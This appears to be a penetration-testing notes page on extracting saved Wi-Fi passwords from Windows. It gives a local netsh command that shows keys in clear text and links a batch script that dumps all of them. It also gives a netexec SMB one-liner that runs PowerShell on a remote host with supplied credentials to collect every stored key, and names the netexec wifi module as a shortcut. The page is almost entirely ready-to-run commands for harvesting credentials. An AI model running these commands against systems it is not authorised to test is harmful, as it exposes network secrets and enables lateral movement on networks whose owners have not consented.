# Get Wireless password from Windows CMD

```
Netsh wlan show profile name="Wi-F name" key=clear
```

For convenience, here is a batch script that will display all the saved passwords.

{% file src="<https://3152193308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuuomMqs69rpH2Wnxhc3O%2Fuploads%2F6sFSZT0qZq5gZSP11Kry%2Fdisplay-all-saved-wireless-passwords.bat?alt=media&token=ba6bbeb9-971f-411c-b8fa-29ffa681958e>" %}

Additionally, you can use netexec in order to automate showing all profiles remotely

{% code overflow="wrap" %}

```bash
netexec smb 10.123.4.21 -u tester1 -p tester1 -x "powershell -Command \"\$profiles = (netsh wlan show profiles) -match 'All User Profile' | ForEach-Object { if (\$_ -match ': (.*)\s*\$') { \$matches[1].Trim() }}; \$results = @(); foreach (\$profile in \$profiles) { if (\$profile) { \$keyContent = (netsh wlan show profile name=\\\"\$profile\\\" key=clear | Select-String -Pattern 'Key Content' | ForEach-Object { if (\$_ -match 'Key Content\s*:\s*(.*)') { \$matches[1] } }); if (\$keyContent -and \$keyContent -ne \$null) { \$results += [PSCustomObject]@{ ProfileName = \$profile; Password = \$keyContent.Trim() } } }}; \$results | Format-Table -AutoSize\""
```

{% endcode %}

Actually, turns out you can do this with the wifi module in Netexec

{% code overflow="wrap" %}

```bash
netexec smb 10.123.4.21 -u tester1 -p tester1 -M wifi
```

{% endcode %}